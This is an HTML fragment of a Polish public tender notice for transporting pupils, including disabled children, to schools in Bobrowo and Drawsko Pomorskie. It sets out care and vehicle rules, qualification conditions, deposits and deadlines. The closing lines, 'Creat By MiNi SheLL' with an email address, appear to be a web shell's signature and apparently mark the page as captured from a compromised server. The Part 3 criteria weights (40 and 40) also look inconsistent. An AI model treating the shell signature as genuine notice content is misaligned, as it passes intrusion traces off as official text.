2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium czas podstawienia pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dowóz i odwóz uczniów do placówki w Bobrowie i Drawsku Pomorskim.<br/>Podstawą do ułożenia tras przewozu są dane dotyczące: liczby przewożonych osób, ściśle określonej trasy przewozu,<br/>Przewóz powinien odbywać się najkrótszą możliwą trasą.<br/>Dowożenie i odwożenie dzieci odbywać się będzie według zaproponowanego przez Wykonawcę i zatwierdzonego przez<br/>Zamawiającego rozkładu jazdy.<br/>Dzieci winny być dowożone do placówek nie wcześniej niż o 7:30 i nie później niż na godzinę 8:00, a odwożone do domów o<br/>godzinie nie później niż o 15:00 w dni nauki szkolnej.<br/>Dokładne oznaczenie przedziałów czasowych i przystanków w jakich powinien być wykonany dowóz dzieci do placówki oraz<br/>ich odwiezienie po zakończeniu zajęć ustalane będzie pomiędzy Wykonawcą a Zamawiającym.<br/>Wykonawca zobowiązany jest świadczyć usługi w taki sposób, aby czas przebywania uczniów w podróży był jak najkrótszy,<br/>co oznacza nie więcej niż 60 minut, a nadto winien uwzględniać to, aby przewożeni uczniowie mogli punktualnie rozpocząć<br/>zajęcia lekcyjne bez zbędnego oczekiwania na nie, a nadto aby po ich zakończeniu byli odwożeni bez zbędnego<br/>oczekiwania.<br/>Rozkład jazdy winien być opracowany tak, aby dzienna trasa przewozu była najkrótsza w danym dniu. Rozkład jazdy nie<br/>może przekraczać ilość kilometrów przedstawionych w załączniku nr 11 do SWZ.<br/>Wykonawca zobowiązany jest ustalić dni dowozu i odwozu uczniów oraz dni<br/>wolne od zajęć z dyrektorami poszczególnych placówek.<br/>Wykaz miejscowości oraz liczba uczniów z poszczególnych miejscowości został przedstawiony w załączniku nr 11 do SWZ.<br/>Zamawiający zastrzega sobie prawo zmiany tras i ilości kilometrów w trakcie realizacji zamówienia przy zachowaniu<br/>obowiązującej stawki za kilometr.<br/>Zamawiający dopuszcza możliwość zmiany ilości dowożonych dzieci. W przypadku zwiększenia ilości dowożonych dzieci<br/>Wykonawca musi zapewnić ich dowóz na warunkach podanych w ofercie.<br/>Wykonawca zobowiązuje się do świadczenia usług przewozowych - ze względu na przewóz dzieci niepełnosprawnych -<br/>wyjątkowo starannie i bezpiecznie, łącznie z roztoczeniem opieki nad dziećmi w czasie całego przejazdu oraz wsiadania i<br/>wysiadania dzieci z pojazdu.<br/>Wykonawca zobowiązuje się do zapewnienia opieki wszystkim dzieciom w czasie świadczenia usługi, poprzez zatrudnienie<br/>opiekuna czuwającego nad bezpieczeństwem dzieci podczas przewozu, wsiadania i wysiadania z pojazdu, przechodzenia<br/>przez jezdnię do pojazdu i z pojazdu. Funkcji opiekuna nie może pełnić kierowca autobusu.<br/>Pojazdy, którymi będzie świadczona usługa powinny być dostosowane do potrzeb osób niepełnosprawnych, w tym do<br/>przewozu dzieci na wózkach inwalidzkich, posiadać w szczególności klimatyzację, ogrzewanie, przesłony przeciwsłoneczne<br/>na szybach, pasy bezpieczeństwa oraz foteliki, zimą oczyszczone z lodu i śniegu stopnie. Należy zapewnić miejsca<br/>siedzące dla wszystkich uczniów.<br/>Pojazdy służące do przewozu dzieci muszą być przeznaczone do tego celu i dostosowanie do liczby przewożonych dzieci.<br/>Wyklucza się łączenie przewozów dzieci z innymi osobami (np. przewozy liniowe).<br/>Przewozy dzieci odbywać się mogą wyłącznie środkami transportu przystosowanymi do przewozu dzieci niepełnosprawnych<br/>tj. dodatkowe wewnętrzne zabezpieczenia, zapewniające bezpieczny transport, dostosowane do indywidulanych potrzeb<br/>każdego dowożonego dziecka.<br/>Pojazdy muszą posiadać polisę OC i NNW dla wszystkich przewożonych osób, wszystkie wymagane przepisami prawa<br/>badania techniczne dla pojazdów oraz przez cały okres realizacji zamówienia aktualną licencję, pozwolenia, zezwolenia,<br/>certyfikaty, wymagane przepisami prawa i niezbędne do prawidłowej realizacji usługi.<br/>Pojazdy służące do przewozu dzieci muszą być nie starsze niż 15 lat.<br/>W przypadku braku możliwości wykonania usługi, Wykonawca własnym staraniem i na własny koszt zapewni pojazd<br/>zastępczy odpowiadający przepisom prawa oraz zapisami zawartej umowy.<br/>W przypadku niezapewnienia przez Wykonawcę środków transportu, o których mowa w ust. 1 pkt 1.20., Zamawiający zleci<br/>wykonanie tej usługi innemu przewoźnikowi, obciążając kosztami Wykonawcę.<br/>Cena winna być ustalona za 1 km przewozu dzieci.<br/>Ustalone wynagrodzenie brutto za km przewozu obejmuje wszystkie koszty<br/>niezbędne do prawidłowej realizacji zadania, w szczególności dowożenia i odwożenie dzieci, zapewnienie im opieki, koszty<br/>ubezpieczenia pojazdu, podatki.<br/>Wynagrodzenie za 1 km nie ulegnie zmianie przez cały okres obowiązywania<br/>umowy.<br/>Zamawiający finansuje jedynie przewóz dzieci od pierwszej do ostatniej miejscowości, wymienionymi w załączniku nr 11 do<br/>SWZ. Zamawiający nie pokrywa dojazdu autobusów z bazy i na bazę Wykonawcy.<br/>Wykonawca zapozna się z miejscem świadczenia usługi, a warunki atmosferyczne i stan techniczny dróg nie będą<br/>podstawą do domagania się zmiany wynagrodzenia.<br/>Kierowcy muszą posiadać wszystkie wymagane przepisami prawa badania i uprawnienia. Kierowcy wyposażeni są w identyfikatory oraz telefony komórkowe.<br/>Wykonawca zapewni opiekuna, którego zadaniem jest nadzór nad uczniami w czasie dowozu, udzielania czynnej pomocy<br/>dzieciom w czasie wsiadania, zajmowania miejsc i przy wysiadaniu oraz przekazanie uczniów rodzicom, pracownikom<br/>przedszkola, szkoły lub placówki, dopilnowanie aby każde dziecko było zapięte, pasem bezpieczeństwa w czasie transportu,<br/>opiekunem nie może być kierowca. Opiekunowie przekazują uczniów uprawnionym osobom (w miejscu<br/>wsiadania/wysiadania – rodzicom albo upoważnionym przez nich osobom, w placówce oświatowej – upoważnionym<br/>pracownikom placówki). Opiekun zostanie zatrudniony przez Wykonawcę w ramach ceny za usługę. Opiekun nad dziećmi w<br/>czasie przewozu sprawuje co najmniej jeden opiekun w każdym z pojazdów. Za właściwe sprawowanie opieki nad dziećmi<br/>podczas przewozów jest odpowiedzialny Wykonawca i ponosi on całkowitą odpowiedzialność za szkodę związaną z<br/>uszczerbkiem na zdrowiu lub życiu przewożonych dzieci, podczas podróży, po wyjściu przez nich z pojazdu oraz przed odjazdem pojazdu.<br/>Wykonawca ponosi całkowitą odpowiedzialność za szkody, które wynikają z ruchu pojazdów i przewozu dzieci przy uwzględnieniu zasad wynikających z obowiązku ubezpieczenia odpowiedzialności cywilnej. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60130000-8 - Usługi w zakresie specjalistycznego transportu drogowego osób</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2023-01-02 do 2023-06-30</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Kryterium czas podstawienia pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>Nie podlegają wykluczeniu.<br/>Spełniają warunki udziału w postępowaniu określone przez Zamawiającego w ogłoszeniu o zamówieniu i niniejszej SWZ.<br/>Zamawiający wymaga wykazania przez Wykonawcę ubiegającego się o udzielenia zamówienia, spełnienia warunków<br/>udziału w postępowaniu dotyczących [art. 112 ust 2 ustawy]:<br/>zdolności do występowania w obrocie gospodarczym [art. 113 ustawy]:<br/>Opis spełnienia warunków:<br/>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełnienia warunków w tym zakresie. Zamawiający nie<br/>dokona oceny spełnienia tego warunku w postępowaniu.<br/>uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej o ile wynika z odrębnych przepisów [art.<br/>114 ustawy]:<br/>Opis spełnienia warunków:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca:<br/>Wykaże, że posiada aktualną licencję na wykonywanie krajowego transportu drogowego osób.<br/>Warunek ten ma być spełniony:<br/>samodzielnie przez Wykonawcę , lub<br/>przez minimum jeden inny podmiot udostępniający Wykonawcy uprawnienia do prowadzenia określonej działalności<br/>gospodarczej lub zawodowej i który zrealizuje usługę , lub w przypadku Wykonawców występujących wspólnie –<br/>samodzielnie przez minimum jednego z Wykonawców występujących wspólnie.<br/>Zamawiający uzna za spełnione warunki dla wszystkich części zamówienia jeżeli Wykonawca posiada aktualną licencję na<br/>wykonywanie krajowego transportu drogowego.<br/>Sytuacji ekonomicznej lub finansowej [art. 115 ustawy]:<br/>Opis spełnienia warunków:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca<br/>Wykaże, że jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem<br/>zamówienia na kwotę gwarancyjną min. 200.000,00 zł na cały okres realizacji zamówienia<br/>Warunek ten ma być spełniony:<br/>samodzielnie przez Wykonawcę , lub przez minimum jeden inny podmiot udostępniający Wykonawcy wymagania dotyczące<br/>sytuacji ekonomicznej lub finansowej, lub w przypadku Wykonawców występujących wspólnie – samodzielnie przez<br/>minimum jednego z Wykonawców występujących wspólnie<br/>Zamawiający uzna za spełnione warunki dla wszystkich części zamówienia jeżeli Wykonawca jest ubezpieczony od<br/>odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę<br/>gwarancyjną min. 200.000,00 zł<br/>Zdolności technicznej lub zawodowej [art. 116 ustawy]:<br/>Opis spełnienia warunków:<br/>Warunek ten zostanie spełniony, jeżeli Wykonawca:<br/>Wykaże, że wykonał należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy - w tym okresie minimum jedną usługę ciągłą polegającą na przewozie uczniów przez<br/>okres min. 6 miesięcy o wartości nie mniejszej niż 75.000,00 zł brutto.<br/>Warunek ten ma być spełniony: samodzielnie przez Wykonawcę , lub<br/>przez minimum jeden inny podmiot udostępniający Wykonawcy swoją wiedzę i doświadczenie i który zrealizuje usługę ,lub<br/>w przypadku Wykonawców występujących wspólnie – samodzielnie przez minimum jednego z Wykonawców występujących<br/>wspólnie.<br/>Zamawiający uzna za spełnione warunki jeżeli Wykonawca wykaże, że wykonał jedno zamówienie o wymaganej wartości<br/>dla wszystkich części zamówienia.<br/>W przypadku złożenia przez Wykonawców dokumentów zawierających kwoty wyrażone w innych walutach niż PLN, dla<br/>potrzeb oceny spełniania warunku określonego powyżej, Zamawiający jako kurs przeliczeniowy waluty przyjmie średni kurs<br/>danej waluty publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień<br/>Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, Narodowy Bank Polski<br/>nie publikuje średniego kursu danej waluty, za podstawę przeliczenia przyjmuje się średni kurs waluty publikowany<br/>pierwszego dnia, po dniu publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on<br/>opublikowany.<br/>Wykaże, że dysponuje lub będzie dysponował pojazdami niezbędnymi do realizacji zamówienia tj.:<br/>dla części nr I - nie mniej niż dwoma pojazdami o łącznej liczbie miejsc siedzących dla minimum 26 uczniów;<br/>dla części nr II - nie mniej niż jednym pojazdem o liczbie miejsc siedzących dla minimum 10 uczniów;<br/>dla części nr III - nie mniej niż jednym pojazdem o liczbie miejsc siedzących dla minimum 32 uczniów.<br/>Warunek ten ma być spełniony:<br/>samodzielnie przez Wykonawcę , lub przez minimum jeden inny podmiot udostępniający Wykonawcy swoje pojazdy ,lub w<br/>przypadku Wykonawców występujących wspólnie – samodzielnie przez minimum jednego z Wykonawców występujących<br/>wspólnie. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Zamawiający w celu potwierdzenia spełnienia warunków udziału w postępowaniu, wezwie Wykonawcę, którego oferta została<br/>najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych, aktualnych na dzień złożenia tj. [art. 274 ust. 1 ustawy]:<br/>Aktualnej licencji na wykonywanie krajowego transportu drogowego osób.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ten/ dokumenty te składa przynajmniej<br/>jeden z Wykonawców.<br/>Wykazu usług wykonanych – według wzoru stanowiącego odpowiednio załącznik nr 5 do SWZ, a w przypadku świadczeń<br/>okresowych lub ciągłych również wykonywanych,<br/>w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem<br/>dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń<br/>okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny<br/>o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku<br/>świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie<br/>powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.<br/>Wykaz usług wykonanych należy przygotować wg wzoru stanowiącego załącznik nr 5 do SWZ.<br/>W przedmiotowym wykazie usług Wykonawca winien wskazać informacje w zakresie określonym w warunkach z rozdziału 24 pkt.<br/>2.4.1 SWZ.<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten/ dokumenty te składa przynajmniej<br/>jeden z Wykonawców.<br/>Wykaz narzędzi, wyposażenia zakładu lub urządzeń technicznych dostępnych wykonawcy w celu wykonania zamówienia<br/>publicznego wraz z informacją o podstawie do dysponowania tymi zasobami.<br/>Wykaz należy przygotować zgodnie z załącznikiem nr 6a, 6b, 6c do SWZ (właściwego dla danej części zamówienia)<br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten/ dokumenty te składa przynajmniej<br/>jeden z Wykonawców.<br/>Dokument potwierdzający że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności<br/>związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez zamawiającego w SWZ. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia muszą wykazać, że łącznie spełniają ten warunek.<br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia dokument ten/ dokumenty te składa przynajmniej<br/>jeden z Wykonawców.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego [na podstawie art. 108 i 109<br/>ustawy], Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie<br/>krótszym niż 5 dni od dnia wezwania, następujących podmiotowych środków dowodowych, aktualnych na dzień złożenia tj. [art. 274<br/>ust. 1 ustawy]:<br/>odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej w zakresie<br/>art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają<br/>wpisu do rejestru lub ewidencji<br/>W przypadku oferty składanej przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument ten składa każdy z<br/>Wykonawców oddzielnie (jeśli dotyczy).<br/>Jeżeli Wykonawca polega na zdolnościach technicznych lub zawodowych lub sytuacji finansowej lub ekonomicznej podmiotów<br/>udostępniających zasoby na zasadach określonych w art. 118 ustawy, Zamawiający żąda od Wykonawcy przedstawienia wyżej<br/>wymienionych podmiotowych środków dowodowych dotyczących tych podmiotów, potwierdzających że nie zachodzą wobec tych<br/>podmiotów podstawy wykluczenia z postępowania.<br/>Jeżeli Wykonawca zamierza powierzyć wykonanie części zamówienia podwykonawcy, który nie jest podmiotem udostępniającym<br/>zasoby na zasadach określonych w art. 118 ustawy, Zamawiający żąda od Wykonawcy przedstawienia wyżej wymienionych<br/>podmiotowych środków dowodowych dotyczących tych podwykonawców, potwierdzających że nie zachodzą wobec tych podwykonawców podstawy wykluczenia z postępowania.<br/>Dokumenty potwierdzające brak podstaw wykluczenia Wykonawcy mającego siedzibę lub miejsce zamieszkania poza terytorium<br/>Rzeczpospolitej Polskiej - Zamiast: odpisu albo informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, o których mowa w Rozdziale 25 ust. 3 SWZ – składa dokument lub dokumenty wystawione w kraju, w<br/>którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji, nie ogłoszono<br/>upadłości, jego aktywami nie zarządza likwidator lub sąd, nie zawarł układu z wierzycielami, jego działalność gospodarcza nie jest<br/>zawieszona ani nie znajduje się on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach<br/>miejsca wszczęcia tej procedury. Dokument ten, powinien być wystawiony nie wcześniej niż 3 miesiące przed jego złożeniem.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca zobowiązany jest, przed upływem terminu składania ofert, wnieść wadium w kwocie:<br/>1) Dla Części I – Dowóz i odwóz uczniów do placówki w Gudowie - 2.440,00 zł (słownie: dwa tysiące czterysta czterdzieści<br/>złotych 00/100).<br/>2) Dla Części II - Dowóz i odwóz uczniów do placówki w Radowie Wielkim - 1.200,00 zł (słownie: tysiąc dwieście złotych<br/>00/100).<br/>3) Dla Części III - Dowóz i odwóz uczniów do placówki w Bobrowie i Drawsku Pomorskim<br/>- 2.650,00 zł (słownie: dwa tysiące sześćset pięćdziesiąt złotych 00/100).<br/>Wadium może być wnoszone w jednej lub kilku następujących formach:<br/>1) w pieniądzu – przelewem na rachunek Zamawiającego,<br/>2) w gwarancjach bankowych;<br/>3) w gwarancjach ubezpieczeniowych;<br/>4) w poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. z 2019r. poz. 310, 836 i 1572).<br/>3. W przypadku wnoszenia wadium w pieniądzu kwotę należy wpłacić przelewem na rachunek bankowy Zamawiającego nr<br/>12 1020 2847 0000 1702 0009 6602. W tytule przelewu należy wpisać: „Wadium w postępowaniu nr IR.271.16.2022.PW.”<br/>4. Skuteczne wniesienie wadium w pieniądzu następuje z chwilą uznania środków pieniężnych na rachunku bankowym<br/>Zamawiającego, o którym mowa w pkt. 3, przed upływem terminu składania ofert.<br/>5. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w pkt. 2, Wykonawca przekazuje<br/>Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej opatrzonej kwalifikowanym podpisem<br/>elektronicznymi osób upoważnionych do jego wystawienia.<br/>6. Z treści gwarancji/poręczenia winno wynikać bezwarunkowe, na każde pisemne żądanie zgłoszone przez Zamawiającego<br/>w terminie związania ofertą, zobowiązanie gwaranta do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach<br/>określonych w art. 98 ust. 6 ustawy.<br/>7. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy, zostanie odrzucona. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku, o którym mowa w art. 117 ust. 2 i 3 ustawy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia<br/>dołączają odpowiednio do wniosku o dopuszczenie do udziału w postępowaniu albo do oferty oświadczenie, z którego<br/>wynika, które usługi wykonają poszczególni Wykonawcy [art. 117 ust. 4 ustawy] - wzór oświadczenia stanowi załącznik nr 9<br/>do SWZ.<br/>Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o którym mowa w art.<br/>112 ust. 2 pkt 2 ustawy, jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty<br/>budowlane, dostawy lub usługi, do których realizacji te uprawnienia są wymagane. [art. 117 ust. 2 ustawy]<br/>W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. [art. 117 ust. 3 ustawy] <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Został określony załączniku nr 4a, 4b, 4c do SWZ &#34;wzór umowy&#34;, w par. 8 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-12-21 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-12-21 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-01-19</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com